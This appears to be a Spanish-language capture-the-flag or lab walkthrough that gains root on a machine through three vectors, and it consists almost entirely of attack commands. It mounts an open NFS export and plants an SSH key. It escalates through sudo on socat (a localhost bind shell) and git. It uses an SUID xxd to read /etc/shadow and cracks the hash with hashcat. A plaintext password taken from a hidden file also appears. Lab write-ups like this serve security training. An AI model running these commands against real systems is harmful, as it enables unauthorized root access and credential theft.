Vector 1: Usuario Peter
Enumeración inicial desde cero
- Identificación de recursos NFS:
showmount -e 192.168.1.137
Export list for 192.168.1.137:
/home/peter *
- Montaje y análisis:
mkdir /mnt/peter
mount 192.168.1.137:/home/peter /mnt/peter/
ls -la /mnt/peter/
- Creación de usuario local para acceso:
groupadd -g 1005 peter
adduser peter -uid 1001 -gid 1005
- Configuración de acceso SSH:
# Como usuario peter
mkdir .ssh
ssh-keygen
cat ~/.ssh/id_rsa.pub > /mnt/peter/.ssh/authorized_keys
Vector 2: Privilegios de Bob
Abuso de permisos sudo
- Verificación de permisos:
sudo -l
# Múltiples binarios disponibles: socat, git, etc.
- Explotación vía socat:
# Primera terminal
sudo socat TCP-LISTEN:9999,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
# Segunda terminal
socat FILE:`tty`,raw,echo=0 TCP:127.0.0.1:9999
- Explotación vía git:
sudo git help status
!/bin/bash -p
- Otros binarios disponibles:
sudo ssh -o ProxyCommand='./sshex.sh' localhost:8
./bbash -p
Vector 3: Usuario Susan
SUID y otros vectores
- Acceso inicial vía archivo oculto:
find / -name ".*" -type f -path "/home/*" -exec ls -al {} \; 2>/dev/null
cat /home/susan/.secret
su - susan
# Password: MySuperSecretValue!
- Búsqueda de binarios SUID:
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
# Se identifica /usr/bin/xxd con SUID root
- Explotación de xxd:
# Como usuario susan (miembro de itservices)
ls -la /usr/bin/xxd
xxd /etc/shadow | xxd -r
- Análisis de hash y cracking:
# En máquina de atacante
hashcat AzER3pBZhGWZE -m 1500 /tools/wordlists/rockyou.txt
# Password encontrado